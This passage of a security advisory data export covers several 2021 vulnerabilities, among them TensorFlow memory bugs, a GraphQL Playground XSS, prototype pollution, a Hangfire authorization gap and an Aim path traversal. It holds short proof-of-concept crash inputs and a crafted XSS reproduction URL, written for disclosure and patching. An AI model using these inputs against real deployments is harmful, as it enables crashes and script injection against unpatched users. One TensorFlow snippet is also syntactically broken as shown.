'https://github.com/starkbank/ecdsa-python/commit/d136170666e9510eb63c2572551805807bd4c17f'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-python'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:23:18Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}" +1.4.0,GHSA-gpfh-jvf9-7wg5,2021-11-08T22:07:11Z,2021-11-10T18:51:21Z,,['CVE-2021-41220'],Use after free / memory leak in `CollectiveReduceV2`,"### Impact +The [async implementation](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/collective_ops.cc#L604-L615) of `CollectiveReduceV2` suffers from a memory leak and a use after free: + +```python +import tensorflow as tf + +tf.raw_ops.CollectiveReduceV2( + input=[], + group_size=[-10, -10, -10], + group_key=[-10, -10], + instance_key=[-10], + ordering_token=[], + merge_op='Mul', + final_op='Div') +``` + +This occurs due to the asynchronous computation and the fact that objects that have been `std::move()`d from are still accessed: + +```cc +auto done_with_cleanup = [col_params, done = std::move(done)]() { + done(); + col_params->Unref(); +}; +OP_REQUIRES_OK_ASYNC(c, + FillCollectiveParams(col_params, REDUCTION_COLLECTIVE, + /*group_size*/ c->input(1), + /*group_key*/ c->input(2), + /*instance_key*/ c->input(3)), + done); +``` + +Here, `done` is already moved from by the time `OP_REQUIRES_OK_ASYNC` macro needs to invoke it in case of errors. In this case, we get an undefined behavior, which can manifest via crashes, `std::bad_alloc` throws or just memory leaks. + +### Patches +We have patched the issue in GitHub commit [ca38dab9d3ee66c5de06f11af9a4b1200da5ef75](https://github.com/tensorflow/tensorflow/commit/ca38dab9d3ee66c5de06f11af9a4b1200da5ef75). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, as this version is the only one that is also affected. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}], 'versions': ['2.6.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gpfh-jvf9-7wg5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41220'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ca38dab9d3ee66c5de06f11af9a4b1200da5ef75'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:07:11Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}" +1.4.0,GHSA-wx8q-rgfr-cf6v,2021-12-10T18:30:24Z,2021-11-10T18:20:11Z,,['CVE-2021-22565'],Insufficient Granularity of Access Control in github.com/google/exposure-notifications-verification-server,"### Impact +Users or API keys with permission to expire verification codes could have expired codes that belonged to another realm if they guessed the UUID. + +### Patches +v1.1.2+ + +### Workarounds +There are no workarounds, and there are no indications this has been exploited in the wild. Verification codes can only be expired by providing their 64-bit UUID, and verification codes are already valid for a very short period of time (thus the UUID rotates frequently). + +### For more information +Contact exposure-notifications-feedback@google.com","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/google/exposure-notifications-verification-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/security/advisories/GHSA-wx8q-rgfr-cf6v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22565'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/exposure-notifications-verification-server/'}, {'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/releases/tag/v1.1.2'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-09T21:03:07Z', 'nvd_published_at': '2021-12-09T13:15:00Z'}" +1.4.0,GHSA-59r9-6jp6-jcm7,2021-11-04T19:36:13Z,2021-11-08T18:06:09Z,,['CVE-2021-41249'],XSS vulnerability in GraphQL Playground from untrusted schemas,"## GraphQL Playground introspection schema template injection attack: Advisory Statement + +This is a security advisory for an XSS vulnerability in `graphql-playground`. + +A similar vulnerability affects `graphiql`, the package from which `graphql-playground` was forked. There is a corresponding `graphiql` [advisory](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8). + +- [1. Impact](#1-impact) +- [2. Scope](#2-scope) +- [3. Patches](#3-patches) +- [4. Reproducing the exploit](#4-reproducing-the-exploit) +- [5. Credit](#5-credit) +- [6. For more information](#6-for-more-information) + +### 1. Impact + +All versions of `graphql-playground-react` older than `graphql-playground-react@1.7.28` are vulnerable to compromised HTTP schema introspection responses or `schema` prop values with malicious GraphQL type names, exposing a dynamic XSS attack surface that can allow code injection on operation autocomplete. + +In order for the attack to take place, the user must load a malicious schema in `graphql-playground`. There are several ways this can occur, including by specifying the URL to a malicious schema in the `endpoint` query parameter. If a user clicks on a link to a GraphQL Playground installation that specifies a malicious server, arbitrary JavaScript can run in the user's browser, which can be used to exfiltrate user credentials or other harmful goals. + +### 2. Scope + +This advisory describes the impact on the `graphql-playground-react` package. The vulnerability also affects `graphiql`, the package from which `graphql-playground` was forked, with a less severe impact; see the [`graphiql` advisory](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8) for details. It affects all versions of `graphql-playground-react` older than `v1.7.28`. + +This vulnerability was introduced with the first public release of `graphql-playground`, so it impacts both the original legacy `graphql-playground` and the contemporary `graphql-playground-react` npm package. It is most easily exploited on `graphql-playground-react@1.7.0` and newer, as that release added functionality which made it possible to override the endpoint URL via query parameter even if it is explicitly specified in the code. + +`graphql-playground-react` is commonly loaded via the `graphql-playground-html` package or a middleware package that wraps it (`graphql-playground-express`, `graphql-playground-middleware-koa`, `graphql-playground-middleware-hapi`, or `graphql-playground-middleware-lambda`). By default, these packages render an HTML page which loads the *latest* version of `graphql-playground-react` through a CDN. If you are using one of these packages to install GraphQL Playground on your domain *and you do not explicitly pass the `version` option to `renderPlaygroundPage` or the middleware function*, then you do not need to take any action to resolve this vulnerability, as the latest version of the React app will automatically be loaded. + +`graphql-playground-react` is also commonly loaded via HTML served by Apollo Server. Apollo Server always pins a specific version of `graphql-playground-react`, so if you are using Apollo Server you do need to take action to resolve this vulnerability. See the [Apollo Server advisory](https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw) for details. + + +### 3. Patches + +`graphql-playground-react@1.7.28` addresses this issue via defense in depth: + +- **HTML-escaping text** that should be treated as text rather than HTML. In most of the app, this happens automatically because React escapes all interpolated text by default. However, one vulnerable component uses the unsafe `innerHTML` API and interpolated type names directly into HTML. We now properly escape that type name, which fixes the known vulnerability. + +- **Validates the schema** upon receiving the introspection response or schema changes. Schemas with names that violate the GraphQL spec will no longer be loaded. (This includes preventing the Doc Explorer from loading.) This change is also sufficient to fix the known vulnerability. + +- **Ensuring that user-generated HTML is safe**. Schemas can contain Markdown in `description` and `deprecationReason` fields, and the web app renders them to HTML using the `markdown-it` library. Prior to `graphql-playground-react@1.7.28`, GraphQL Playground used two separate libraries to render Markdown: `markdown-it` and `marked`. As part of the development of `graphql-playground-react@1.7.28`, we verified that our use of `markdown-it` prevents the inclusion of arbitrary HTML. We use `markdown-it` without setting `html: true`, so we are comfortable relying on [`markdown-it`'s HTML escaping](https://github.com/markdown-it/markdown-it/blob/master/docs/security.md) here. We considered running a second level of sanitization over all rendered Markdown using a library such as `dompurify` but believe that is unnecessary as `markdown-it`'s sanitization appears to be adequate. `graphiql@1.4.3` does update to the latest version of `markdown-it` (v12, from v10) so that any security fixes in v11 and v12 will take effect. On the other hand, [`marked`](https://github.com/markedjs/marked) recommends the use of a separate HTML sanitizer if its input is untrusted. In this release, we switch the one component which uses `marked` to use `markdown-it` like the rest of the app. + +**If you are using `graphql-playground-react` directly in your client app**, upgrade to version 1.7.28 or later. + +**If you are using `graphql-playground-html` or a package which starts with `graphql-playground-middleware-` in your server** and you are passing the `version` option to a function imported from that package, change that `version` option to be at least `""1.7.28""`. + +**If you are using `graphql-playground-html` or a package which starts with `graphql-playground-middleware-` in your server** and you are **NOT** passing the `version` option to a function imported from that package, no action is necessary; your app automatically loads the latest version of `graphql-playground-react` from CDN. + +### 4. Reproducing the exploit + +We are hosting a ""malicious"" server at https://graphql-xss-schema.netlify.app/graphql . This server has a hard-coded introspection result that includes unsafe HTML in type names. + +If you manually change a GraphQL Playground installation to use that endpoint, clear the operation pane, and type `{x` into the operation pane, an alert will pop up; this demonstrates execution of code provided by the malicious server. + +An URL like https://YOUR-PLAYGROUND-SERVER/?endpoint=https%3A%2F%2Fgraphql-xss-schema.netlify.app%2Fgraphql&query=%7B will load already configured with the endpoint in question. (This URL-based exploit works on `graphql-playground-react@1.7.0` and newer; older versions may be protected from this particular URL-based exploit depending on their configuration.) +### 5. Credit + +This vulnerability was discovered by [@Ry0taK](https://github.com/Ry0taK), thank you! :1st_place_medal: + +Others who contributed: + +- extensive help from [@glasser](https://github.com/glasser) at [Apollo](https://github.com/apollographql) +- [@acao](https://github.com/acao) +- [@imolorhe](https://github.com/imolorhe) +- [@divyenduz](https://github.com/divyenduz) +- [@dotansimha](https://github.com/dotansimha) +- [@timsuchanek](http://github.com/timsuchanek) +- [@benjie](https://github.com/Ry0taK) and many others who provided morale support + +### 6. For more information + +If you have any questions or comments about this advisory: + +- The `graphiql` advisory document contains [more information](https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability) about how both the client-side and server-side vulnerabilities work +- Open an issue in the [graphql-playground repo](https://github.com/graphql/graphql-playground/new/issues) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'graphql-playground-react'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.28'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41249'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphql-playground/commit/b8a956006835992f12c46b90384a79ab82bcadad'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability'}, {'type': 'PACKAGE', 'url': 'https://github.com/graphql/graphql-playground'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T19:36:13Z', 'nvd_published_at': '2021-11-04T20:15:00Z'}" +1.4.0,GHSA-896r-f27r-55mw,2022-08-10T23:36:10Z,2021-11-19T20:16:17Z,,['CVE-2021-3918'],json-schema is vulnerable to Prototype Pollution,json-schema before version 0.4.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-schema'}, 'ecosystem_specific': {'affected_functions': ['json-schema.validate']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3918'}, {'type': 'WEB', 'url': 'https://github.com/kriszyp/json-schema/commit/22f146111f541d9737e832823699ad3528ca7741'}, {'type': 'WEB', 'url': 'https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a'}, {'type': 'WEB', 'url': 'https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa'}, {'type': 'PACKAGE', 'url': 'https://github.com/kriszyp/json-schema'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/bb6ccd63-f505-4e3a-b55f-cd2662c261a9'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/12/msg00013.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:44:27Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}" +1.4.0,GHSA-v5vg-g7rq-363w,2022-07-15T20:23:13Z,2021-11-08T17:40:49Z,,['CVE-2021-23820'],Prototype Pollution in json-pointer,This affects versions of package `json-pointer` up to and including `0.6.1`. A type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-pointer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.6.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23820'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/pull/36'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/commit/931b0f9c7178ca09778087b4b0ac7e4f505620c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/manuelstofer/json-pointer'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/blob/master/index.js%23L78'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPOINTER-1577287'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:55:47Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}" +1.4.0,GHSA-7rq6-7gv8-c37h,2021-11-03T14:35:35Z,2021-11-03T17:30:59Z,,['CVE-2021-41238'],Missing Authorization with Default Settings in Dashboard UI,"Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization filters specified, `LocalRequestsOnlyAuthorizationFilter` filter is being used to allow only local requests and prohibit all the remote requests to provide sensible, protected by default settings. + +However due to the recent changes, in version 1.7.25 no authorization filters are used by default, allowing remote requests to succeed. + +### Impact + +Missing authorization when default options are used for the Dashboard UI, e.g. when no custom authorization rules are used as recommended in the [Using Dashboard](https://docs.hangfire.io/en/latest/configuration/using-dashboard.html#configuring-authorization) documentation article. + +#### Impacted + +If you are using `UseHangfireDashboard` method with default `DashboardOptions.Authorization` property value, then your installation is impacted: + +```csharp +app.UseHangfireDashboard(); // Impacted +app.UseHangfireDashboard(""/hangfire"", new DashboardOptions()); // Impacted +``` + +#### Not Impacted + +If any other authorization filter is specified in the `DashboardOptions.Authorization` property, the you are not impacted: + +```csharp +app.UseHangfireDashboard(""/hangfire"", new DashboardOptions +{ + Authorization = new []{ new SomeAuthorizationFilter(); } // Not impacted +}); +``` + +### Patches + +Patch is already available in version [1.7.26](https://github.com/HangfireIO/Hangfire/releases/tag/v1.7.26) and already available on NuGet.org, please see [Hangfire.Core 1.7.26](https://www.nuget.org/packages/Hangfire.Core/1.7.26). Default authorization rules now prohibit remote requests by default again by including the `LocalRequestsOnlyAuthorizationFilter` filter to the default settings. Please upgrade to the newest version in order to mitigate the issue. + +### Workarounds + +It is possible to fix the issue by using the `LocalRequestsOnlyAuthorizationFilter` explicitly when configuring the Dashboard UI. In this case upgrade is not required. + +```csharp +// using Hangfire.Dashboard; + +app.UseHangfireDashboard(""/hangfire"", new DashboardOptions +{ + Authorization = new []{ new LocalRequestsOnlyAuthorizationFilter(); } +}); +``` + +### References + +Original GitHub Issue: https://github.com/HangfireIO/Hangfire/issues/1958","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Hangfire.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.25'}, {'fixed': '1.7.26'}]}], 'versions': ['1.7.25']}]","[{'type': 'WEB', 'url': 'https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41238'}, {'type': 'WEB', 'url': 'https://github.com/HangfireIO/Hangfire/issues/1958'}, {'type': 'PACKAGE', 'url': 'https://github.com/HangfireIO/Hangfire'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Hangfire.Core'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T19:50:00Z', 'nvd_published_at': '2021-11-02T18:15:00Z'}" +1.4.0,GHSA-7fw7-gh23-f832,2022-05-04T03:47:21Z,2021-11-01T19:19:29Z,,['CVE-2020-36381'],Vulnerability in singleCrunch function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the singleCrunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36381'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T18:59:05Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}" +1.4.0,GHSA-f54p-f6jp-4rhr,2021-11-08T21:57:41Z,2021-11-10T18:46:52Z,,['CVE-2021-41223'],Heap OOB in `FusedBatchNorm` kernels,"### Impact +The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/fused_batch_norm_op.cc#L1292) of `FusedBatchNorm` kernels is vulnerable to a heap OOB: + +```python +import tensorflow as tf + +tf.raw_ops.FusedBatchNormGrad( + y_backprop=tf.constant([i for i in range(9)],shape=(1,1,3,3),dtype=tf.float32) + x=tf.constant([i for i in range(2)],shape=(1,1,1,2),dtype=tf.float32) + scale=[1,1], + reserve_space_1=[1,1], + reserve_space_2=[1,1,1], + epsilon=1.0, + data_format='NCHW', + is_training=True) +``` + +### Patches +We have patched the issue in GitHub commit [aab9998916c2ffbd8f0592059fad352622f89cda](https://github.com/tensorflow/tensorflow/commit/aab9998916c2ffbd8f0592059fad352622f89cda). + +The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f54p-f6jp-4rhr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41223'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/aab9998916c2ffbd8f0592059fad352622f89cda'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:57:41Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}" +1.4.0,GHSA-qg54-694p-wgpp,2023-05-16T16:07:35Z,2021-11-16T00:32:30Z,,['CVE-2021-41817'],Regular expression denial of service vulnerability (ReDoS) in date,"Date’s parsing methods including Date.parse are using Regexps internally, some of which are vulnerable against regular expression denial of service. Applications and libraries that apply such methods to untrusted input may be affected. + +The fix limits the input length up to 128 bytes by default instead of changing the regexps. This is because Date gem uses many Regexps and it is possible that there are still undiscovered vulnerable Regexps. For compatibility, it is allowed to remove the limitation by explicitly passing limit keywords as nil like Date.parse(str, limit: nil), but note that it may take a long time to parse. + +Please update the date gem to version 3.2.1, 3.1.2, 3.0.2, and 2.0.1, or later. You can use gem update date to update it. If you are using bundler, please add gem ""date"", "">= 3.2.1"" to your Gemfile. If you import `date` from the standard library rather than as a gem you should update your Ruby install to `3.0.3`, `2.7.5`, `2.6.9` or later. + +Users unable to upgrade may consider using `Date.strptime` instead with a predefined date format +```ruby +Date.strptime('2001-02-20', '%Y-%m-%d') +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41817'}, {'type': 'WEB', 'url': 'https://github.com/ruby/date/commit/3959accef8da5c128f8a8e2fd54e932a4fb253b0'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1254844'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/date'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/date/CVE-2021-41817.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IUXQCH6FRKANCVZO2Q7D2SQX33FP3KWN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTOJGS5IEFDK3UOO7IY4OTTFGHGLSWZF/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/11/15/date-parsing-method-regexp-dos-cve-2021-41817/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T00:15:43Z', 'nvd_published_at': '2022-01-01T05:15:00Z'}" +1.4.0,GHSA-8phj-f9w2-cjcc,2022-05-26T19:49:03Z,2021-11-23T22:03:23Z,,['CVE-2021-43775'],Arbitrary file reading vulnerability in Aim,"### Impact +A path traversal attack aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. + +Vulnerable code: https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16 + +### Patches +The vulnerability issue is resolved in Aim v3.1.0. + +### References +https://owasp.org/www-community/attacks/Path_Traversal + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'aim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/security/advisories/GHSA-8phj-f9w2-cjcc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43775'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/issues/999'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/pull/1003'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/pull/1003/commits/f01266a1a479ef11d7d6c539e7dd89e9d5639738'}, {'type': 'PACKAGE', 'url': 'https://github.com/aimhubio/aim'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T18:48:09Z', 'nvd_published_at': '2021-11-23T21:15:00Z'}" +1.4.0,GHSA-2xwq-h7r9-6w27,2021-11-22T18:46:48Z,2021-11-23T17:59:40Z,,['CVE-2021-3957'],Cross-site Scripting in kimai2,Cross site request forgery vulnerability is present in delete functionality of doctor feature. This vulnerability is capable of deleting system logs,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3957'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/6b49535b523dcd36ec59462ee4e67e2b3a9151f3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5fa3098a-ba02-45e0-af56-645e34dbc691'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:46:48Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}" +1.4.0,GHSA-6hpv-v2rx-c5g6,2021-11-08T22:36:05Z,2021-11-10T19:02:17Z,,['CVE-2021-41209'],FPE in convolutions with zero size filters,"### Impact +The [implementations for convolution 